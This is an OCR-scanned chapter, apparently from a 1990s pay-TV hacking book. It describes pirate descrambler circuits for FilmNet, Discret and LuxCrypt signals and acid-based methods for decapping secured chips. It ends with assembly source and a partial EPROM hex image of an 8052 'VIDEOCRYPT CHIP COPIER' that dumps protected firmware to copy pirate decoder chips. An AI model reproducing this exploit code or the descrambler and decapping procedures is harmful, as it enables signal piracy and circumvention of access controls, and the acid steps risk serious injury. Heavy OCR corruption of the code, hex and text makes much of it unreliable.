The first part of the logic section is a phase adjustment. This is used to 
properly position the horizontal blanking window relative to the video. 


The inverters are 40106 Schmitt types. The phase detector is a 4070 EXOR 
gate followed by an integrator. The output of the integrator is the error 
voltage and is used to control the frequency of the VCXO. 


The VCXO is based on the 74HC04 inverter IC. This IC requires a supply of 
5VO to operate correctly. Its primary advantage is its low current operation. 
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The output of the VCXO is converted to a 12V pk to pk signal by the 
transistor buffer. 


The buffered 2 MHz signal from the VCXO is fed to the 4520 dual binary 
counter. This IC is used to divide the 2 MHz frequency. The use of 
combinational logic on the outputs produces a properly timed horizontal 
blanking window. This horizontal blanking signal is combined with the output 
of the field pulse separator, (integrator), to provide a properly timed 
composite blanking signal. This signal is used to control the synch insertion 
section of the video strip. An AND gate ensures that there is no synch signal 
when the descrambler circuitry is disabled by the autoswitching circuit. 


The autoswitching circuit integrates the field pulses. If the receiver is not 
tuned to FilmNet, there is no field pulse present at the input to this circuit. 
This will cause S1 to close and S2 to open. This action passes normal 
polarity video to the video clamping and output stage. The output of the 
composite blanking AND gate is forced low by this circuit. 


The Video Strip 


The МЕ592 is used to provide a variable gain amplifier. The positive and 
negative outputs are fed to a number of 4066 switches. The first two 
switches, S1 and S2, control the selection of the video. 


Control 
51 52 

01 Normal Video, Descrambler Off 
10 Descrambler Active 


The control signal for S2 could be used to effect loopthrough on some of the 
ASTRA receivers. 


The second set of switches, S2 and S3, are the field polarity selectors. 
These are controlled by the outputs of the field polarity flipflop in the logic 
section. A preset is included so that any DC offset between the outputs can 
be nulled. 


The selected video source is fed to a clamp to remove the dispersal 
waveform. The synch pull down is effected by turning on and off a transistor 
switch. The level of pull down is controlled by the 47K preset. 
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Case Study: The "Radio Plans’’ Design 


This is the circuit that was published in the "Radio Plans" magazine. The 
magazine issue was seized by the courts. A French newspaper, "Le 
Quotidien", then published the controversial design. In that way the design 
reached more people than it ever would have. It also became public 
knowledge. 


The "Radio Plans" descrambler was designed for use on a SECAM signal 
rather than a PAL signal. The timing on the PAL version is slightly different. 
In terms of commercial hacking the "Radio Plans" descrambler is not viable. 
Most of the subsequent hacker circuits replaced major sections of the circuit 
with simpler more repeatable circuitry. The resulting descrambler was 
cheaper and overcame the chip shortage problem that occurred. 


The versions of Discret currently in operation have, in the majority of cases, 
been upgraded to counter this particular design. It is highly illegal to use a 
pirate descrambler in France. It is also illegal to use a pirate cable 
descrambler in Ireland. The following case study is for informational use 
only. 


The Radio Plans circuit can be considered as five sections; the audio 
descrambler, the start of video detector; the video descrambler; the video 
multiplexing section and the synch generator circuit. The design used a 
number of rather expensive integrated circuits. It was exceedingly popular 
with the home constructors. The shops selling the kits had to reorder by the 
components by the hundred. This massive demand led to a shortage of the 
critical ICs. Hackers were forced to improvise and adapt other circuits. 
Some of these adapted circuits are shown later. 


The Audio Descrambler 


The audio in the Discret system is rotated about a 12.8 KHz carrier. The 
"Radio Plans" design uses a crystal oscillator running at 3.2768 MHz. The 
oscillator is based on two 4584 CMOS inverters. One inverter is used as the 
oscillator and the other inverter is used as the buffer. 


The output of the oscillator is fed to a 4020 divider. This divides the 
oscillator frequency by 256 to produce the 12.8 KHz carrier. The output of 
the 4020 is fed to a transistor filter. This is used to filter the harmonics 
present and to convert the square wave to a sine wave. 


The 12.8 KHz sine wave is then fed to a 1496 balanced demodulator IC. 
The 1496 circuit is configured for single rail operation. The scrambled audio 
is also inputted to this IC. A 47K preset provides balancing and cancellation 
control. 
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The output of the 1496 is fed to a single transistor filter to remove any 
remaining 12.8 KHz signal from the descrambled audio. The descrambled 
audio is then fed back to the SCART connector. 


The Start Of Video Detector 


The scrambled video from the output of the first TBA970 on the video 
descrambler section is fed to a transistor two stage low pass filter. This filter 
removes the chrominance from the video waveform. The resulting video 
signal is then amplified by a factor of five. The signal from the op-amp is fed 
to the back level sample and hold and to the comparator. 


The sample and hold circuit is based on a 4066 as the sampling switch and 
a polystyrene 1n5 capacitor as the storage or hold capacitor. The op-amp 
used as the buffer is a simple TLO72 type. In this application it is configured 
as a non inverting amplifier with unity gain. The output of the amplifier is fed 
to the comparator. 


The comparator is continually comparing the voltage difference between the 
sampled black level and the video signal. It has to detect a rise of 
approximately 150 mV. The sample gate is controlled by the sandcastle 
pulse generated by the synch generator circuit. The output of the compara- 
tor is fed to a transistor level converter. This converts the comparator output 
to CMOS logic levels. It is not strictly required. 


The sandcastle pulse also triggers the first monostable. This generates a 
delay to position the start of video window in the correct area of the line. The 
output of this monostable controls the enabling of the start of video pulse 
monostable. This second monostable generates a fixed length pulse to 
indicate the start of video. 


The Video Descrambler 


The video descrambler section is composed of delay lines and black level 
clampers and amplifiers. The delay lines used are the TDA4560. These are 
configured to give an 888 nS delay on the video. The TDA4560 gyrator 
delay line has a good response as far as 5 MHz. The gyrator delay line has 
a loss of 6 db. This means that some amplification is required to restore the 
level to normal. The signal must also have black level clamping. This is 
essential for proper descrambling. If there is a difference in black levels 
between each of the delayed video signals, there will be strobing on the 
screen. This effect is similar to the effect on some FilmNet descramblers 
when the two fields are not at the same level. 
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There are four outputs from the video descrambler. Three, one from each 
ТВА970, are fed to the video multiplexing circuitry. The output from the first 
ТВА970 is also fed to the Start Of Video Detector circuit. 


The Video Multiplexing Circuitry 


There are basically four elements in this section. The first of these is the 
monostable timing chain. This is a chain of three monostables. The first 
monostable generates a delay that positions the outputs of the two other 
monostables. These other monostables generate the windows or Data 
signals for the flipflops. 


The flipflops control the multiplexer. The D pin on each flipflop is only high 
during its respective window. This means it is only possible for the flipflop to 
change the state of its output during that window. The start of video pulse 
provides the clocking pulse (CL) on each flipflop. The LI signal form the 
synch generator circuit is fed to the RESET pin on each flipflop. This 
ensures that the multiplexers are switched to the two delay mode by 
resetting the flipflops at the start of the horizontal synch pulse. This is to 
ensure that the synch and colour burst section of the line pass through 
without being delayed. This is essential for proper line stability in the 
descrambled picture. 


The multiplexer used is the 4053. This IC has three single pole double throw 
(SPDT) switches. Only two of the switches are actually used in this design. 
In some of the commercial pirate designs, a single 4066 with two inverters 
was used to replace the 4053. 


The output of the second multiplexer switch is fed to the video amplifier. 
This is the TDA1034 or LM318 operational amplifier. The output from the 
TDA1034 is taken to the push pull amplifier. The complete video amplifier 
section is replaced in most of the pirate designs by a single transistor 
emitter follower on the output of the second multiplexer switch. 


The Synch Generator 


This section of the circuit is used to generate the sandcastle control signal 
and the LI control signal. It strips the synchs from the scrambled video and 
uses them to phase lock a line oscillator. 


It is a standard television horizontal synch circuit but has proven to be too 
costly for anything other than home construction. This circuit has largely 
been replaced by a synch stripper and monostable combination. 
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RP Synch Generator Circuit 


Note: The photocopy of this circuit was 
not clear, Some of the connections and 
values may he wrong. 
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Field Pulse Derived Carrier (12.8 KHz) 


12.8 KHz Carrier 
4046 
| Divide Ву 256 i 


To Audio 
Descrambler 
Field Pulse (50 Hz? 


Circult 






Hacker Synch Stripper 


| For Discret Timing 
[2 pere 


Synch 
Stripper 








HS Field Integrator 














H Synch Burst Video 
Gate Line 


The comparator synch stripper circuit is given 
elsewhere in this chapter. 
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The Hi-Tech Discret J Card 


The Discret card is perhaps one of the best examples of what can be 
achieved with a microcontroller based design. It uses a 68705 EPROM type 
microcontroller as the microcontroller. 


The Discret system operates by delaying the video in each line by one of 
three delays; 0 nS, 902 nS ог 1804 nS. The standard method of 
descrambling the signal was pioneered by the Radio Plans design. The 
method involved detecting the rise from black level to the start of video. If 
the video was not delayed, the two delay units were added. If the video was 
delayed by one unit, then another delay unit was added. If the video was 
delayed by two units then it was gated straight through. This created a black 
band at the left hand side of the screen, but on most television it was lost on 
the overscan. 


The problem with trying to detect the rise from black level was that it was 
wide open to countermeasure by the programme provider. To nuke the first 
Radio Plans based descramblers, all Canal Plus had to do was insert a level 
other than black in the delay area. The descramblers could not find the 
black level and hence their detection circuitry failed. 


Hi-Tech has kept the video descrambling section and used a different 
method for slotting in the delays. The necessary data to descramble the 
signal is transmitted in one of the VBI lines. By using this information and 
processing it with the 68705, it is possible to set the delay slots without 
using the rise from black detection. 


The descrambler can be considered in two sections, the video strip and the 
microcontroller section. 


The Video Strip 


The input section of the video strip is a two transistor design. A FET 
configured as a variable gain resistor provides automatic gain control. This 
is essential for the data and synch stripping. The AGC is applied to the input 
of the video amplifier. The output of this amplifier is buffered and fed to the 
delay lines. 


Three video signals are necessary to descramble the signal; an undelayed 
video signal, a one delay video signal and a two delay video signal. In order 
to maintain a constant amplitude among the signals, two presets are 
included in the 0 delay and the 2 delay chains. A single terminating resistor 
is included on the 1 delay chain. The switching between the video signals is 
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effected by three 4066 switches. The output of each of these switches is fed 
to one of the inputs on a 4052 multiplexer. 


The 4052 controls the switching between synch and video signals. The 
descrambled video is fed to a two stage transistor buffer. The video output 
is taken from a 1К0 preset on the emitter of the second transistor. 


The Microcontroller Section 


The microcontroller used in this design is the 68705. This is a secured 
EPROM version. Should an upgrade be necessary, Hi-Tech can easily 
issue a replacement. The crystal frequency is 4.0 MHz. 


The control signals are extracted from the video by a divider and 
comparator network. The topmost comparator strips the data from the video 
signal. This is fed to the microcontroller. 


The second comparator is the AGC comparator. This triggers the 4538 
monostable. The monostable creates a 1 uS window in which to sample the 
blanking level. A gated comparator samples the signal and the output is 
integrated and fed to the ТІ081 AGC amplifier. In this way the amplitude of 
the video signal is kept constant. This is an essential requirement for this 
type of decoder as the divider - comparator chain will not operate properly if 
the voltages are off spec. 


The third comparator is the synch stripper. This provides a synch train the 
the microcontroller so that the correct lines can be selected for data 
extraction. 


The microcontroller will supply the switching control signals to the 4052 
multiplexer. The switching control signals combines the proper synch 
signals with the descrambled video. 


A lock detect circuit is operated by the microcontroller. This circuit will send 
a descrambler select signal to the SCART control circuitry. 
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EBU Resyncher 


Some readers of previous versions have expressed an interest in receiving 
signals that have the synchs corrupted either intentionally, as is the case 
with EBU sound in synch, or accidentally as is the case with poor CNR. 


In the past, descramblers like the PDS synch generator have been used to 
lock up these signals for display. While we do not have the circuit diagram 
of the PDS synch generator, we do have a somewhat cheaper alternative. 


The EBU format system is designed to optimise the satellite power. On a 
normal satellite transmission, the audio is transmitted on a subcarrier in the 
range 5 MHz to 8 MHz. This consumes some of the available power. The 
EBU system economises by putting the audio in the video waveform. This 
means that the EBU transmission format is essentially only a video 
waveform. As a result, the power that would have been used for an audio 
subcarrier can now be used for the video. This gives a better CNR. 


The EBU sound in synch system is essentially a PAL 625 signal with pulse 
coded modulation, (PCM), data inserted into the horizontal synch section. 
The PCM data tends to confuse the synch stripping circuitry of some 
monitors and televisions. This is due to the continually changing nature of 
the data. The synch detector is expecting a nice clean pulse. Instead it 
receives a glitchy set of pulses. Some of the televisions and monitors that 
use edge detection should not have any problems. 


Recovering the video on this system merely involves replacing the 
horizontal synch pulse area in the scrambled signal with a new properly 
timed horizontal synch pulse. The following is a design idea rather than a 
complete circuit. The circuit elements have been tested and used in other 
descramblers. 


Circuit Description 


A number of circuit elements are required for this operation. The first is a 
synch stripper. The comparator type given in chapter three is used for this. 


The second circuit element is a monostable. This produces the necessary 
timing pulse to switch out the digital data and reinsert a flat level for the 
synch tip. 


The third section is the video section. This section is somewhat more 
complex than the previous elements though it has been simplified as much 
as possible. The input signal to the video section is unclamped video. A 
video must be clamped for proper processing. The circuit used for this is a 
typical satellite television receiver circuit. The voltage rating of the Zener is 
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4V7. The clamped video is then fed to a double pole switch consisting of 
two 4066 gates. 


The function of the electronic switch is to allow the video to be gated 
through and the digital data to be replaced. The video switch is normally 
closed except for the period of the digital audio. The digital audio gate is 
normally open but is closed for the digital audio period. This gate is 
connected to a preset that sets the synch tip voltage. 


The outputs of the two gates are connected to a buffer transistor. The 
output of the transistor amplifier should be clamped video without the digital 
audio. It may be necessary to add a field pulse detector and some logic in 
order to stop the gating triggering on the field pulse section of the signal. 


Case Study: LuxCrypt 


The IRDETO system was patented in 1982. It was the forerunner of the 
OAK ORION system. From studying the patent, it would appear that the 
most daunting aspect of the system is the digital audio. The scrambling 
system used by RTL4-V is known as LuxCrypt and is a subset of the 
IRDETO system. 


The basic strength of the system is that it relies on the replacement of synch 
pulses to scramble the video. Since there are no synch pulses in the 
scrambled video signal, the television receiver cannot lock the picture. The 
old synch generator descramblers such as the Digisync and the PDS Synch 
Generator could lock the scrambled IRDETO signal in its present format. 


The main strength of the LuxCrypt subset is the active video inversion. A 
number of types of video inversion are allowed for in the specification. The 
type used in the January 1990 upgrade was Average Peak Level, 
(pronounced apple). This type of inversion inverts the video polarity if the 
amount of white or black in a scene exceeds a preset threshold. The 
shortest time between inversions is three seconds. 


Many of the present pirate descramblers on the market detect the polarity of 
the video at the start of each field. This is not the best method. 


There is a polarity key in each line. Some pirates disagree with this view 
claiming that the polarity key is actually an artifact or glitch left over from the 
scrambling process. 


From observation, it appears that it is a polarity key. The official descram- 
bler is a low cost unit and as such it would need some facility for 
re-establishing the black level in the scrambled video. This polarity bit would 
provide such a facility. 
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The colour burst does not change in time relative to the other components 
in the video signal. It is therefore a usable reference. The basic idea is to 
detect the colour burst using a tuned circuit and use it to synch a phase 
locked loop such as the 4046 or the TBA920. The SRP1000 design 
(FilmNet descrambler in Version 3) could probably be adapted for use by 
using a peak detector or comparator on the output of the tuned circuit. The 
output of the tuned circuit reaches its maximum at the end of the colour 
burst. 


The field synch can be recreated by counting the number of colour bursts 
and triggering a set of monostables. The first monostable would be used to 
position the field pulse. 


The procedure for determining the video polarity can be broken into three 
steps. 

1. The Colour burst is detected and used as the timing reference. 

2. The Burst, (Blanking level), is sampled. 

3. The polarity key is sampled. 


If the burst level is higher than the polarity key level then the video polarity is 
normal. 


If the burst level is lower than the polarity key then the video polarity is 
inverse. 


If the burst level is equal to the polarity key then the signal is not scrambled. 


The 2 MHz PLL used in the PLL FilmNet design could be adapted for use in 
this application. The main change would be in the horizontal blanking 
decoding on the output of the counter. A comparator would be used to 
detect the colour burst peak. A sampling gate circuit such as that used in 
the SRP1000 design would eliminate some of the false triggering. 


On Astra 1-C, RTL-5 is now using what appears to be a version of the 
LuxCrypt system. Some of the old pirate descramblers will not lock up on 
the signal, perhaps indicating that the system may be employing APL 
inversion. 


Hi-Tech Galaxy RTL4V Stand Alone Descrambler 


This is a stand alone descrambler for the LuxCrypt system as used on the 
RTL-4 channel. The system as implemented on Luxcrypt is a minimal 
system. It is a derivative of the IRDETO system. The audio scrambling 
facility, IRDETO's most powerful aspect, not used. 


3-52 


3: Descrambler Building Blocks 


The main attraction of RTL-4V is that many of the terrestrial television 
sit-coms and serials are shown. Unfortunately, they are scrambled as 
RTL4-V only buys the local rights. The Luxcrypt system is a token 
scrambling system in that it is not really meant to offer any serious 
protection. 


The stand alone RTL4-V descrambler is a PLL based design. It is 
essentially three sections; the video input strip, the PLL and the video output 
strip. 


The Video Input Strip 


The first part of the video input strip uses two discrete transistor amplifiers 
to amplify the baseband input. The input level of the second amplifier is 
controlled by a 500R preset on the output of the first amplifier. 


The second amplifier feeds a video bandpass filter. The output of the filter is 
buffered and fed to an inverting and non inverting buffer. These provide the 
necessary normal and inverted video signals necessary for descrambling 
the signal. 


The PLL 


The VCXO of the phase locked loop is constructed around a 5.752 MHz 
crystal. Two gates of a 74HC04 hex Schmitt inverter are used. The phase 
comparator is a switched type. The switch is a 4066 gate and this switches 
between the oscillator output, CLK5M7, and the sampled clock signal. 


The horizontal and vertical timing are generated by different sections of 
logic. The field timing is used to trigger the horizontal timing section 
constructed around the 27256 EPROM and also to trigger the decoder 
select control. 


The core of the descrambler is the 27256 EPROM. The PLL clocks two 
counters which control the addressing on the EPROM. By using a series of 
counters and combinational logic on the EPROM outputs, it is possible to 
generate the sample and control slots necessary to descramble the signal. 
This is an elegant solution to the problem. 


The Video Output Strip 


The video output stage owes much to the Oak ORION design published in 
the Pink And Brown book. It uses 4066 switches to effect the clock 
sampling and the clamping. 
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RTL4-V Descrambler Block Diagram 
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The clamping is necessary to restore the synch pulses and blanking in the 
descrambled video. The main switching for this operation is performed by a 
4051. The video output is buffered and then fed to the output. 


The connectors on this descrambler are the same as those on the other 
Galaxy type descramblers, two SCART connectors and two phono connec- 
tors. The loopthrough and switching is controlled by the PLL logic. A relay is 
also used in this design. 


The Power Supply 


The power supply uses a 15 Volt transformer feeding a bridge rectifier. A 1 
Amp fuse is included prior to the bridge rectifier. An LED indicates that 
power is present. 


Two IC regulators are used to produce the +12 Volts and +6 Volts supply 
lines. Each has its own reservoir capacitor and separate decoupling 
capacitors. 


Popping Secured Microcontrollers 


The removal of security is one of the by-products of a hack. It is often more 
a hardware issue than a software issue. This is due mainly to the fact that 
the device under examination is usually a microcontroller. 


The term used for the process of removing the security is "popping". The 
origin comes from electronic repair work. When a unit has to be repaired, 
the case or cover has to be removed. Hence you pop the top. The basic 
techniques for getting access to the silicon die of the chip involves popping 
the top of the chip. 


While software techniques do exist, the fastest and often most dangerous 
techniques are based on removal of the material surrounding the silicon 
chip itself. The best way to do this is using strong acid, usually Sulphuric or 
Nitric. It is however an extremely dangerous procedure that requires proper 
facilities and precautions. 


Some details posted on BBSes and the internet referred to boiling battery 
acid to obtain a purer form of sulphuric acid for the process. However 
boiling acid is extremely dangerous and it does tend to create fumes. The 
fumes are often toxic. In the case of sulphuric or nitric acids these fumes 
can kill you. The vapours from strong solutions of nitric acid irritate the 
respiratory system and can burn the skin and eyes. At the worst, a few 
lungfuls of these concentrated vapours can result in a very unpleasant 
death. 
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The fumes have to be vented away from the operating areas. In a properly 
equipped laboratory, such work is possible using a fume cupboard. It is not 
exactly a kitchen table hack. 


The technique of boiling sulphuric acid to derive a stronger, more 
concentrated form of the acid is to say the least an extremely dangerous 
operation. The document posted on the BBSes suggested boiling the acid in 
a pyrex container until white clouds of sulphur dioxide were given off. It is 
this gas that has to be vented off. 


The procedure referred to drilling a hole in a PIC16C57 until the silicon die 
was just visible. Then with a hypodermic syringe a small amount of 
concentrated sulphuric acid was placed in the hole. This acid was left for a 
few minutes to dissolve the remaining material over the silicon die. Then the 
chip was flushed with acetone to remove and neutralise the acid. Apparently 
after this it was possible to reset the fuses on the chip by shining a UV 
eraser on the area from a distance of roughly five inches away. 


In many cases, the removal of the material surrounding the silicon die is not 
necessary. Indeed there are some very nice little hacks that can be used to 
get access to the secured ROM, EPROM or EEPROM using non-standard 
voltages and or non-standard timing. 


Over the last few years the claims of security made for certain chips have 
been, too say the least, destroyed. As the industry progresses, there is a 
constant battle to secure the hacks both against the channels and against 
other hackers and pirates. The results have, in some cases been 
catastrophic. The best illustration of this was the release of the information 
on popping the РІС16С84. 


The techniques of popping chips became important when the descrambler 
designs for the analogue systems, FilmNet, Teleclub. RTL-V started to 
include microcontrollers. The commonest microcontroller was the 8051 and 
the EPROM version, the 8751. Naturally the descrambler manufacturers 
were worried about the probability that other manufacturers would copy the 
codes. Therefore they used the One Time Programmable (OTP) versions. 
Naturally there were ways around the problem but since most of the 
systems were fairly primitive, the descramblers remained predominantly 
analogue. It was not until 1993 that the methods of popping these 
microcontrollers took on a new significance. 


In early 1993, the first Ho Lee Fook chips started to appear. Initially, these 
chips were intended to replace the 8052 in the official VideoCrypt decoder 
thus creating the Cardless VideoCrypt decoder. They were based on the 
8752 and 8751 microcontrollers. 


3-58 


3: Descrambler Building Blocks 


Hacking The 8752/8751 Futuretron Chips 


This is the is one of the original programs, in assembler for hacking the 
Futuretron chips. The Futuretron hack on VideoCrypt issue 07 was based 
on the 8752 and later the 8751. The version used was the One Time 
Programmable version. The only difference between the OTP version of the 
chip and the EPROM version is that the EPROM version has a quartz glass 
window to allow the chip to be reprogrammed. 


Of course it was possible to physically remove the top of the chip and reset 
the fuses using the conventional techniques. But there was a simpler and 
less messy method of extracting the data from the chip's secured EPROM. 


This hack exploited the MOV a, @DPTR instruction to spoof the microcon- 
troller to switch momentarily to external EPROM, read a routine, switch 
back to the internal EPROM and execute the routine. The routine dumped 
the contents of the secured EPROM out of the serial port. 


The hack operates in the following manner: 


1. The microcontroller is booted up with the 
internal EPROM on. 


2. When the microcontroller is running the 
internal EPROM, the EA pin is switched to select 
external EPROM. 


3. The microcontroller then reads the routine 
from EPROM at 2000h and dumps the contents of the 
secured EPROM out of the serial port. 


4. APC running a terminal program logs the 
output of the serial port. 


The hack makes use of an 8051/8052 development board. The program, 
HACK.ASM is compiled and loaded into an EPROM. (the hex listing for the 
program is also included here) The EPROM and the chip to be read are 
placed in the development board and the unit is powered up. The terminal 
program then captures the secured EPROM contents to a log which can be 
saved and disassembled later. 


Other similar hacks exist for different microcontroller families. Indeed one of 
the more popular hacks of the late eighties and early nineties was that for 
the 68705 which may have been based along similar lines. 
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dede eee de e de e e e e e e e e I e e e e e e e e e e e e e e e e de e ee TIT e e e ee de de de e de dede e e dee e e e 
, 


; THIS SOURCECODE HACKS 8052 MICROCONTROLLERS WITH ITS TWO 

; SECURITY BIT SET. THE SOURCE IS MADE TO GET THE CODE OF 

; VIDEOCRYPT CLOWN CHIPS. YOU CAN USE THIS SOFTWARE ON ANY 
;8051 EVALUATION BOARD AND THE HACK IS DONE BY SWITCHING FROM 
; INTERNAL TO EXTERNAL PROGRAM MEMORY . WHAT YOU NEED IS A 

; TERMINAL PROGRAM WITH CAPTURE ON, SERIAL DATA IS COMING OUT 
; FROM THE TXD PIN ON THE MICROCONTROLLER, GOOD LUCK! ! ! 

; NOTE: PLEASE USE A 11.0592 MHZ X-TAL 


de e e e de e e e e e e he e de he e e e e he e e e e e e e de e e e de de e de e e e je e fe je e e de dede e dede de dede dede dede e dee 
, 


BEGIN: 


CSEG AT 


CALL . RS INIT 

MOV DPTR, #TEKST1 
CALL RS_DPTR 

5ЈМР $ 

2000H 

CALL = RS_INIT 

MOV DPTR, #TEKST2 
CALL RS_DPTR 

MOV DPTR , #LOGO 
CALL RS_DPTR 


MOV А,#32 

CALL DELAY 

MOV DPTR , #0000H 
CALL GETTER 


MOV ОРТА, #TEKST3 
CALL RS_DPTR 

MOV A, #32 

CALL DELAY 

MOV DPTR, #0000H 


CALL GETTER 
MOV B,A 
MOV ы A,DPH 
CALL RS HEX 
MOV — A,DPL 
CALL RS. HEX 
MV S AES 
CALL . RS. ASC 
MOV А,В 
CALL RS. HEX 
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CALL 
INC 
MOV 
CINE 
MOV 
52МР 


PUSH 
PUSH 
MOV 
MOV 
CLR 
MOV 


RS_CR 

DPTR 

A,DPH 

A, #20H, LOOP 
DPH, #0 

LOOP 


DPH 
DPL 
R2,#1 
RO, #0 
A 
@RO,A 


dee hee ee e II e e e e e e e e e e e e e e de ee e dee ee ee eee dee de de dee dee de e de e dee 
, 


; TRAP ADRESS, PLEASE TRY ONE OF THESE 


e fe e e e e fe fe fe e e e fe e e fe e de e e e e e e e fe e e e e e he e e e e je e e e he e e de e e e e d € 
, 


CALL 
POP 
POP 
RET 


016B1H; 012DAH ; 17ACH 
DPL 
DPH 


de e fe e e e e e e e e e e he e e e e he e e e ee e e e hee e e e ee e e e e e e he ee e e he e e e e e e e e ee ee 
, 


; BEGIN MODULE RS-232 


e e e e e e fe fe e e e e e e e e e e e ee e e e hee e e e e e К e e e hehe e e e he e e e he he e e e e he e e e fe e e e 
, 


RS. INIT: 


RS. CR: 


MOV 
MOV 
MOV 
MOV 
MOV 
SETB 
MOV 
CALL 
CLR 
RET 


PUSH 
MOV 
CALL 
MOV 
CALL 
POP 
RET 


TMOD , #20H 

TH1, #0FDH ; BEPAALD BAUDRATE 
TCON , #040H 

SCON , #058H 

87H, #000H ; DUBBELE BAUDRATE=80, ANDERS 00 
P3.1 

А, #1 

DELAY ;HERSTEL RS-232 

TI 


ACC 
A, #0AH 
RS_ASC 
A, #0DH 
RS_ASC 
ACC 
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RS_DPTR: 


RS_DPTR_1: 


RS_DPTR_2: 


RS_ASC: 


RS_HEX: 


HEXTABEL : 


RS. DEC: 
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CLR A 

MOVC  A,QGA«DPTR 

СМЕ A,#’~’,RS_DPTR_1 
RET 


СМЕ  A,£'^',RS DPTR 2 
CALL RS_CR 

INC DPTR 

SJMP RS. DPTR 


CALL RS_ASC 
INC DPTR 
SJMP RS DPTR 


MOV SBUF,A 
JNB TI,$ 

CLR TI 

RET 

PUSH ОРН 

PUSH DPL 

PUSH АСС 

MOV DPTR, #HEXTABEL 
SWAP A 

ANL A, #00FH 

МОУС A,@A+DPTR 
CALL RS_ASC 

POP ACC 

PUSH АСС 

ANL A, #00FH 

MOVC А, @А+ОРТК 
CALL RS_ASC 

POP ACC 

POP DPL 

РОР DPH 

RET 

DB '0123456789ABCDEF' 
PUSH АСС 
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PUSH В 
MOV В, #100 
DIV AB 
ADD A, #30H 
CALL — RS. ASC 
MOV A,B 
MOV B, #10 
DIV AB 
ADD A, #30H 
CALL RS_ASC 
MOV A,B 
ADD А, #30H 
CALL RS_ASC 
POP B 
POP ACC 
RET 
TEKST1: 
DB “соор LUCK "e 
DB A e e e fe fe e e e e e e e hee e e e ee e e e e e e eee e e ee e e ee de e e eee Y 
DB ** VIDEOCRYPT CHIP COPIER VERSION 2.02 *`' 
DB 5 de e ke e e fe e e e e e he e ee e e fe e e e e e e e fe e e e e e e e e fe je e ee e dede! 
DB de 
DB “1. SWITCH TO INTERNAL КОМ”, 
DB ‘2. RESET СНІР”” 
DB *3. SWITCH BACK TO EXTERNAL ROM `` ' 
DB ‘4. WAIT FOR THE MESSAGE READY ТО COPY' * 
DB ‘5. SWITCH BACK TO INTERNAL КОМ ~’ 
TEKST2: 
DB die nb E READY TO COPY SWITCH TO INTERNAL ROM`~’ 
TEKST3: 
DB a REL NC HEY-LOW-FUCK.... HERE IT COMES...."" 
DB “АМО ENJOY YOUR COPIES OF A SKY-CLOW(N) `’ 
LOGO: 
DB e 
DB елу 
DB " 0000000000 `?’ 
DB ' 00000000 ^" 
DB "00007” 
DB ‘00°’ 
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DB "05555ККҮҮ0”” 

DB "05ККҮҮО0” 

DB "0555 KKK YYO~’ 

DB "05ККҮ0”” 

DB 'OSSSSKKYO"" 

DB '0077 

DB ’ 0000 `’ 

DB ' 0000 0000 ^" 

DB " 0000000000 *’ 

DB Ps 

DB " MULTY-CHANNELS `’ 

DB LN 

DELAY: PUSH 050Н 
PUSH  051H 
PUSH 052Н 
MOV 50H,A 
MOV 51H, #00H 
MOV 52H, #00H 

DELAY_2: DJNZ 52H, DELAY_2 
DJNZ 51H, DELAY_2 
DJNZ 50H, DELAY_2 
POP 052H 
POP 051Н 
РОР 050H 
RET 

END 


EPROM Image Of HACK. ASM 


:0В0000001220619020Ғ512208980ҒЕ84 

:102000001220619022231220899022471220897425 
:10201000201225С090000012204Ғ90225312208908 
:1020200074201225С090000012204ҒҒ5Ғ0Е5831285 
:1020300020A5E5821220A5743A12209DE5F0122019 
:10204000A512207AA3E583B420DE75830080D9C071 
:1020500083C0827A017800E4F61216B1D082D08370 
:10206000227589207580Ғ075884075985875870093 
:10207000D2B174011225C0C29922C0E0740A1220A4 
:102080009D740D12209DD0E022E493B47E0122B411 
:102090006005117AA380F212209DA380ECF 599309F 
:1020400099Ғ0С29922С083С082С0Е09020С4С4546С 
:1020В0000Ғ93119000Е0С0Е0540Ғ93119000Е0005С 
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:1020С0008200832230313233343536373839414289 
:1020000043444546С0Е0С0Ғ075Ғ06484243011904Ғ 
:1020Е000Е5Ғ075Ғ0048424301190Е5Ғ0243011904Ғ 
: 1020F000D0F0D0E022474F4F44204C55434B606016 
:1021000060606060606060606060606060606060CF 
:10211000602A2A2A2A2A2A2A2A2A2A2A2A2A2A2AE9 
:102120002ҮА2А2А2А2А2А2А2А2А2А2А2А2А2А2А2АОҒ 
:102130002A2A2A2A2A2A2A2A2A2A2A2A602A2020DD 
:1021400020564944454Ғ4352595054204348495022 
:1021500020434Ғ504945522056455253494Ғ4Е2037 
:10216000322Е30322020202А602А2А2А2А2А2А2А90 
:102170002А2А2А2А2А2А2А2А2А2А2А2А2А2А2А2АВҒ 
:102180002A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2AAF 
:102190002A2A2A2A6060312E205357495443482066 
:1021A000544F20494E5445524E414C20524F4D60A1 
:10218000322Е205245534554204348495060332Е17 
:1021C00020535749544348204241434B20544F2009 
:1021D00045585445524E414C20524F4D60342E20AC 
:1021E0005741495420464F5220544845204D4553AD 
:1021F0005341474520524541445920544F20434FB5 
:10220000505960352Е20535749544348204241438А 
:102210004B20544F20494E5445524E414C20524F72 
:102220004D60606060606060606060606052454109 
:10223000445920544Ғ20434Ғ5059605357495443Ғ9 
:102240004820544Ғ20494Е5445524Е414С20524Ғ45 
:1022500040607Е60606060606060606060484559А0 
:10226000204С4Ғ5720465543482Е2Е2Е2Е20484594 
:10227000524520495420434Ғ4045532Е2Е2Е2Е605В 
:10228000414E4420454E4A4F5920594F5552204304 
:102290004F50494553204F46204120534B592D4321 
:102240004С4Ғ57284Е296020202020202020202010 
:1022B000202020202020202020202020202020201E 
:1022С000202020202020202020202020202020200Е 
:1022D00020206020202020202020202020202020BE 
:1022E00020202020202020202020202020202020EE 
:1022Ғ000202020202020202020202020202060209Е 
:10230000202020202020202020202020204Ғ4Ғ4Ғ40 
:102310004Ғ4Ғ4Ғ4Ғ4Ғ4Ғ4Ғ20202020202020202074 
:102320002020202020202020202060202020202060 
:1023300020202020204F4F4F4F20202020202020E1 
:102340002020204F4F4F4F202020202020202020D1 
:102350002020202020206020202020202020204Ғ0Е 
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:102360004F2020202020202020202020202020203E 
:102370002020204F4F2020202020202020202020FF 
:10238000202060202020202020204F2020202020DE 
:102390002020202020202020202020202020202030 
:10234000204Ғ2020202020202020202020206020ВЕ 
:1023B00020202020204F2020202020535353532022 
:1023C0004B2020204B2059202020592020204F2016 
:1023D00020202020202020202020602020202020BD 
:1023Е0004Ғ20202020205320202020204820204835 
:1023F00020205920202059202020204F202020203C 
:102400002020202020206020202020204F2020205D 
:1024100020202053535320204B4B4B202020205969 
